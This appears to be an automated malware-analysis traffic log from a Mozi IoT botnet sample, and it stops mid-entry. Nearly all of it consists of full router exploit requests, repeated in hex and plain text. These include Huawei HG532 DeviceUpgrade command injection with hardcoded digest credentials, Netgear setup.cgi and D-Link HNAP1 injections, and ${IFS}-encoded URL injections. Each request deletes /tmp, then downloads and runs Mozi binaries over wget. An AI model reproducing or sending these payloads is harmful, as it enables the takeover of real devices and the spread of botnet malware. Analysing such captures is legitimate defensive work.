                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 61.102.63.196:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 101.87.65.249:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 4.37.49.168:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 115.127.83.25:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 215.21.207.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 47.122.83.230:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 118.10.156.24:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 34.209.161.32:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 80.140.236.37:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 